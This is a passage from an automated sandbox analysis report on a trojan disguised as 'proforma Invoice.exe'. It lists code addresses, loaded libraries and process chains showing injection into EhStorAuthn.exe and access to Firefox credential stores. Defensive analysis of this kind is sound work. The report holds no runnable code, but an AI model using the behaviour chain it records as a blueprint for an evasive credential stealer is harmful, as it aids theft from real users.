                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011F02C03_2_011F02C0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011705353_2_01170535
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_012305913_2_01230591
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_012224463_2_01222446
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0121E4F63_2_0121E4F6
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011947503_2_01194750
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011707703_2_01170770
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116C7C03_2_0116C7C0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118C6E03_2_0118C6E0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011869623_2_01186962
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0123A9A63_2_0123A9A6
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011729A03_2_011729A0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011728403_2_01172840
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0117A8403_2_0117A840
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011568B83_2_011568B8
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119E8F03_2_0119E8F0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0122AB403_2_0122AB40
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01226BD73_2_01226BD7
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116EA803_2_0116EA80
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0117AD003_2_0117AD00
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01188DBF3_2_01188DBF
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116ADE03_2_0116ADE0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170C003_2_01170C00
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01210CB53_2_01210CB5
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01160CF23_2_01160CF2
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01190F303_2_01190F30
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011B2F283_2_011B2F28
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E4F403_2_011E4F40
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011EEFA03_2_011EEFA0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01162FC83_2_01162FC8
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0117CFE03_2_0117CFE0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0122EE263_2_0122EE26
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170E593_2_01170E59
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01182E903_2_01182E90
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0122CE933_2_0122CE93
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0122EEDB3_2_0122EEDB
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0123B16B3_2_0123B16B
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0115F1723_2_0115F172
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A516C3_2_011A516C
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0117B1B03_2_0117B1B0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0122F0E03_2_0122F0E0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_012270E93_2_012270E9
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011770C03_2_011770C0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0121F0CC3_2_0121F0CC
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0122132D3_2_0122132D
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0115D34C3_2_0115D34C
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011B739A3_2_011B739A
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011752A03_2_011752A0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_012112ED3_2_012112ED
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118B2C03_2_0118B2C0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_012275713_2_01227571
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0120D5B03_2_0120D5B0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0122F43F3_2_0122F43F
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011614603_2_01161460
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0122F7B03_2_0122F7B0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_012216CC3_2_012216CC
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011799503_2_01179950
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118B9503_2_0118B950
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0483E4F66_2_0483E4F6
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_048424466_2_04842446
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_048505916_2_04850591
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047905356_2_04790535
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047AC6E06_2_047AC6E0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047907706_2_04790770
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047B47506_2_047B4750
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0478C7C06_2_0478C7C0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_048220006_2_04822000
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_048501AA6_2_048501AA
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_048481CC6_2_048481CC
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047801006_2_04780100
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0482A1186_2_0482A118
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_048181586_2_04818158
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_048102C06_2_048102C0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_048302746_2_04830274
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_048503E66_2_048503E6
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0479E3F06_2_0479E3F0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0484A3526_2_0484A352
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_04830CB56_2_04830CB5
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_04790C006_2_04790C00
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_04780CF26_2_04780CF2
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0479AD006_2_0479AD00
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0478ADE06_2_0478ADE0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047A8DBF6_2_047A8DBF
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0484CE936_2_0484CE93
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_04790E596_2_04790E59
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0484EEDB6_2_0484EEDB
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0484EE266_2_0484EE26
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047A2E906_2_047A2E90
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0480EFA06_2_0480EFA0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047B0F306_2_047B0F30
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047D2F286_2_047D2F28
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0479CFE06_2_0479CFE0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_04782FC86_2_04782FC8
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_04804F406_2_04804F40
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0479A8406_2_0479A840
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047928406_2_04792840
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047BE8F06_2_047BE8F0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047768B86_2_047768B8
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047A69626_2_047A6962
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0485A9A66_2_0485A9A6
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047929A06_2_047929A0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0478EA806_2_0478EA80
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_04846BD76_2_04846BD7
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0484AB406_2_0484AB40
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047814606_2_04781460
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0484F43F6_2_0484F43F
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0482D5B06_2_0482D5B0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_048475716_2_04847571
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_048416CC6_2_048416CC
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0484F7B06_2_0484F7B0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0483F0CC6_2_0483F0CC
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0484F0E06_2_0484F0E0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_048470E96_2_048470E9
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047970C06_2_047970C0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0477F1726_2_0477F172
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C516C6_2_047C516C
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0479B1B06_2_0479B1B0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0485B16B6_2_0485B16B
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_048312ED6_2_048312ED
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047AB2C06_2_047AB2C0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047952A06_2_047952A0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0477D34C6_2_0477D34C
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0484132D6_2_0484132D
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047D739A6_2_047D739A
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0484FCF26_2_0484FCF2
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_04809C326_2_04809C32
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_04793D406_2_04793D40
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047AFDC06_2_047AFDC0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_04841D5A6_2_04841D5A
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_04847D736_2_04847D73
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_04799EB06_2_04799EB0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0484FFB16_2_0484FFB1
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0484FF096_2_0484FF09
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_04791F926_2_04791F92
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047FD8006_2_047FD800
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047938E06_2_047938E0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047999506_2_04799950
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047AB9506_2_047AB950
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0482DAAC6_2_0482DAAC
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0483DAC66_2_0483DAC6
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_04847A466_2_04847A46
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0484FA496_2_0484FA49
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047D5AA06_2_047D5AA0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_04803A6C6_2_04803A6C
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_04805BF06_2_04805BF0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047CDBF96_2_047CDBF9
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0484FB766_2_0484FB76
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047AFB806_2_047AFB80
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_006F1A006_2_006F1A00
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_006F50606_2_006F5060
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_006F32B06_2_006F32B0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0070B7006_2_0070B700
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_006EC92A6_2_006EC92A
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_006EC9306_2_006EC930
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_006ECB506_2_006ECB50
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_006EABD06_2_006EABD0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0463E6B36_2_0463E6B3
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0463D7786_2_0463D778
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0463E1F46_2_0463E1F4
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_0463E3146_2_0463E314
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_046453CD6_2_046453CD
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: String function: 0115B970 appears 177 times
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: String function: 011B7E54 appears 69 times
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: String function: 011DEA12 appears 73 times
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: String function: 011EF290 appears 96 times
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: String function: 011A5130 appears 33 times
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: String function: 047C5130 appears 40 times
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: String function: 0477B970 appears 274 times
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: String function: 047D7E54 appears 99 times
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: String function: 047FEA12 appears 86 times
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: String function: 0480F290 appears 105 times
                Source: proforma Invoice.exe, 00000000.00000000.2041228009.0000000000ACC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAQae.exe" vs proforma Invoice.exe
                Source: proforma Invoice.exe, 00000000.00000002.2066272292.0000000007620000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs proforma Invoice.exe
                Source: proforma Invoice.exe, 00000000.00000002.2051666042.00000000010EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs proforma Invoice.exe
                Source: proforma Invoice.exe, 00000003.00000002.2475930945.000000000125D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs proforma Invoice.exe
                Source: proforma Invoice.exe, 00000003.00000002.2475617708.0000000000CD7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEhStorAuthn.exej% vs proforma Invoice.exe
                Source: proforma Invoice.exeBinary or memory string: OriginalFilenameAQae.exe" vs proforma Invoice.exe
                Source: proforma Invoice.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: proforma Invoice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.proforma Invoice.exe.49e9198.0.raw.unpack, pAdSVAtSJwrJrQ6sVq.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.proforma Invoice.exe.49e9198.0.raw.unpack, pAdSVAtSJwrJrQ6sVq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.proforma Invoice.exe.49e9198.0.raw.unpack, pAdSVAtSJwrJrQ6sVq.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.proforma Invoice.exe.49e9198.0.raw.unpack, CemaC0EQg1IJaEF3y9.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.proforma Invoice.exe.4961978.1.raw.unpack, pAdSVAtSJwrJrQ6sVq.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.proforma Invoice.exe.4961978.1.raw.unpack, pAdSVAtSJwrJrQ6sVq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.proforma Invoice.exe.4961978.1.raw.unpack, pAdSVAtSJwrJrQ6sVq.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.proforma Invoice.exe.4961978.1.raw.unpack, CemaC0EQg1IJaEF3y9.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.proforma Invoice.exe.7620000.5.raw.unpack, pAdSVAtSJwrJrQ6sVq.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.proforma Invoice.exe.7620000.5.raw.unpack, pAdSVAtSJwrJrQ6sVq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.proforma Invoice.exe.7620000.5.raw.unpack, pAdSVAtSJwrJrQ6sVq.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.proforma Invoice.exe.7620000.5.raw.unpack, CemaC0EQg1IJaEF3y9.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@12/9
                Source: C:\Users\user\Desktop\proforma Invoice.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\proforma Invoice.exe.logJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile created: C:\Users\user\AppData\Local\Temp\s002-5pJump to behavior
                Source: proforma Invoice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: proforma Invoice.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: EhStorAuthn.exe, 00000006.00000003.2664472670.0000000000899000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000003.2664429862.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.4497404276.0000000000899000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.4497404276.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.4497404276.0000000000878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: proforma Invoice.exeReversingLabs: Detection: 52%
                Source: unknownProcess created: C:\Users\user\Desktop\proforma Invoice.exe "C:\Users\user\Desktop\proforma Invoice.exe"
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess created: C:\Users\user\Desktop\proforma Invoice.exe "C:\Users\user\Desktop\proforma Invoice.exe"
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeProcess created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess created: C:\Users\user\Desktop\proforma Invoice.exe "C:\Users\user\Desktop\proforma Invoice.exe"Jump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeProcess created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
